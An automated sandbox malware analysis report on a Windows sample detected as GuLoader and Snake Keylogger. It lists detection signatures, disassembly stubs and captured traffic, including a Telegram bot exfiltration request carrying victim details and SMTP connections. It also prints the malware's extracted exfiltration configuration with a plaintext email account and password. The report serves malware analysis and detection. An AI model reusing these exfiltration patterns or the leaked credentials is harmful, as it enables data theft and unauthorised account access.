Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
________.exe

Overview

General Information

Sample name:________.exe
Analysis ID:1554160
MD5:89b3b4723ea3983fc0f103eaf3093edc
SHA1:bb6fb38b57fd6694e0803d1de469f0a326e231f4
SHA256:69a0042174fbffed7ac840081ec1d5618f2a70fe4d56078b98a1db06627f9eab
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ________.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\________.exe" MD5: 89B3B4723EA3983FC0F103EAF3093EDC)
    • ________.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\________.exe" MD5: 89B3B4723EA3983FC0F103EAF3093EDC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.1623677806.000000000330D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: ________.exe PID: 2916JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
          Process Memory Space: ________.exe PID: 5916JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\________.exe", CommandLine: "C:\Users\user\Desktop\________.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\________.exe, NewProcessName: C:\Users\user\Desktop\________.exe, OriginalFileName: C:\Users\user\Desktop\________.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\Desktop\________.exe", ProcessId: 2916, ProcessName: ________.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 37.27.123.72, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\________.exe, Initiated: true, ProcessId: 5916, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49731
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-12T07:36:32.879752+010020229301A Network Trojan was detected52.149.20.212443192.168.2.849706TCP
            2024-11-12T07:37:12.770892+010020229301A Network Trojan was detected52.149.20.212443192.168.2.849732TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-12T07:36:50.311923+010028033053Unknown Traffic192.168.2.849717188.114.96.3443TCP
            2024-11-12T07:36:52.391719+010028033053Unknown Traffic192.168.2.849719188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-12T07:36:47.682495+010028032742Potentially Bad Traffic192.168.2.849715193.122.130.080TCP
            2024-11-12T07:36:48.280641+010028032742Potentially Bad Traffic192.168.2.849715193.122.130.080TCP
            2024-11-12T07:36:49.593155+010028032742Potentially Bad Traffic192.168.2.849715193.122.130.080TCP
            2024-11-12T07:36:51.686922+010028032742Potentially Bad Traffic192.168.2.849718193.122.130.080TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: ________.exeAvira: detected
            Source: 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
            Source: ________.exeVirustotal: Detection: 8%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E986C4 CryptUnprotectData,3_2_35E986C4
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E98EF1 CryptUnprotectData,3_2_35E98EF1
            Source: ________.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49716 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405772
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_0040622D FindFirstFileW,FindClose,1_2_0040622D
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_00402770 FindFirstFileW,1_2_00402770
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_00402770 FindFirstFileW,3_2_00402770
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405772
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0040622D FindFirstFileW,FindClose,3_2_0040622D
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 0015F2EDh3_2_0015F150
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 0015F2EDh3_2_0015F33C
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 0015F2EDh3_2_0015F3B8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 0015FAA9h3_2_0015F804
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4E311h3_2_32D4E068
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D431E8h3_2_32D42DD0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D42C21h3_2_32D42970
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4FD21h3_2_32D4FA78
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4F8C9h3_2_32D4F620
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4DA61h3_2_32D4D7B8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4D609h3_2_32D4D360
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4D1B1h3_2_32D4CF08
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D40D0Dh3_2_32D40B30
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D41697h3_2_32D40B30
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4E769h3_2_32D4E4C0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_32D40040
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4DEB9h3_2_32D4DC10
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D431E8h3_2_32D42DC3
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4F471h3_2_32D4F1C8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4F019h3_2_32D4ED70
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D431E8h3_2_32D43116
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 32D4EBC1h3_2_32D4E918
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E99280h3_2_35E98FB0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E97EB5h3_2_35E97B78
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E902E9h3_2_35E90040
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9C8B6h3_2_35E9C5E8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E918A1h3_2_35E915F8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E95E81h3_2_35E95BD8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9E8A6h3_2_35E9E5D8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9B676h3_2_35E9B3A8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E91449h3_2_35E911A0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E92E59h3_2_35E92BB0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9F656h3_2_35E9F388
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E95A29h3_2_35E95780
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9D666h3_2_35E9D398
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9E416h3_2_35E9E148
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E90FF1h3_2_35E90D48
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9C426h3_2_35E9C158
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E92A01h3_2_35E92758
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E955D1h3_2_35E95328
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E979C9h3_2_35E97720
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9D1D6h3_2_35E9CF08
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E925A9h3_2_35E92300
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9B1E6h3_2_35E9AF18
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9F1C6h3_2_35E9EEF8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E90B99h3_2_35E908F0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9BF96h3_2_35E9BCC8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E97571h3_2_35E972C8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E95179h3_2_35E94ED0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E92151h3_2_35E91EA8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9DF86h3_2_35E9DCB8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then mov esp, ebp3_2_35E9ACBC
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E96733h3_2_35E96488
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E932B1h3_2_35E9308D
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E90741h3_2_35E90498
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9ED36h3_2_35E9EA68
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E93709h3_2_35E93460
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9CD46h3_2_35E9CA78
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E94D21h3_2_35E94A78
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E97119h3_2_35E96E70
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E91CF9h3_2_35E91A50
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9DAF6h3_2_35E9D828
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E948C9h3_2_35E94620
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9BB06h3_2_35E9B838
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E962D9h3_2_35E96030
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E96CC1h3_2_35E96A18
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35E9FAE6h3_2_35E9F818
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F064E0h3_2_35F061E8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F05EB7h3_2_35F05B48
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F03506h3_2_35F03238
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F010BEh3_2_35F00DF0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F08FE8h3_2_35F08CF0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F022C6h3_2_35F01FF8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0BAF0h3_2_35F0B7F8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0D2D8h3_2_35F0CFE0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F042B6h3_2_35F03FE8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0FDE0h3_2_35F0FAE8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0079Eh3_2_35F004D0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F07CC8h3_2_35F079D0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0A7D0h3_2_35F0A4D8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0BFB8h3_2_35F0BCC0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F03996h3_2_35F036C8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0EAC0h3_2_35F0E7C8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F069A8h3_2_35F066B0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F05986h3_2_35F056B8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F094B0h3_2_35F091B8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0AC98h3_2_35F0A9A0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F03076h3_2_35F02DA8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0D7A0h3_2_35F0D4A8
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0EF88h3_2_35F0EC90
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F05066h3_2_35F04D98
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F08190h3_2_35F07E98
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0154Eh3_2_35F01280
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F09978h3_2_35F09680
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F02756h3_2_35F02488
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0C480h3_2_35F0C188
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0DC68h3_2_35F0D970
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F04747h3_2_35F04478
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F06E70h3_2_35F06B78
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F00C2Eh3_2_35F00960
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F08658h3_2_35F08360
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F01E36h3_2_35F01B68
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0B160h3_2_35F0AE68
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0C948h3_2_35F0C650
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F03E26h3_2_35F03B58
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0F450h3_2_35F0F158
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0030Eh3_2_35F00040
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F07338h3_2_35F07040
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F09E40h3_2_35F09B48
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0B628h3_2_35F0B330
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0E130h3_2_35F0DE38
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0F918h3_2_35F0F620
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F054F6h3_2_35F05228
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F08B20h3_2_35F08828
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F019B7h3_2_35F01710
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0A308h3_2_35F0A010
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F02BE6h3_2_35F02918
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0CE10h3_2_35F0CB18
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F0E5F8h3_2_35F0E300
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F04BD6h3_2_35F04908
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F07800h3_2_35F07508
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F31B20h3_2_35F31828
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F30CC8h3_2_35F309D0
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F31658h3_2_35F31360
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F30800h3_2_35F30508
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F31190h3_2_35F30E98
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then jmp 35F30339h3_2_35F30040
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_360B3E70
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_360B3E60
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_360B0D26
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_360B0A10
            Source: C:\Users\user\Desktop\________.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_360B09E1

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.8:49731 -> 37.27.123.72:587
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2012/11/2024%20/%2018:46:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49718 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49715 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49706
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49732
            Source: global trafficTCP traffic: 192.168.2.8:49731 -> 37.27.123.72:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49716 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2012/11/2024%20/%2018:46:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
